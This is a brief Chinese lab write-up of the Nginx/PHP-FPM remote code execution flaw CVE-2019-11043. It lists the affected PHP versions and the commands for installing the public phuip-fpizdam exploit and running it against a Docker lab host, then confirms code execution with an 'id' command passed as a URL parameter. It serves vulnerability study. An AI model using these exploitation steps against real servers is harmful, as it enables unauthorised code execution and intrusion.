CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx PHP-FPM的服务器 URL发送 时,服务器返回异常。攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp。Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。
影响范围
在 Nginx PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响:
PHP 7.0
PHP 7.1
PHP 7.2
PHP 7.3
漏洞利用
首先访问漏洞环境,漏洞环境是用docker搭建的。
攻击机是kali,攻击脚本是go语言写的所以要有go环境,从github上下载exp
go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam
执行上面命令后,目录下就会生成 phuip-fpizdam 文件,然后执行攻击命令
./phuip-fpizdam
http://192.168.123.49:8080/index.php
在浏览器输入执行命令,查看当前id
http://192.168.123.49:8080/?a=id
很明显攻击成功了,当前用户是www-data 还需要进一步提取呀!
注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。
推荐文章++++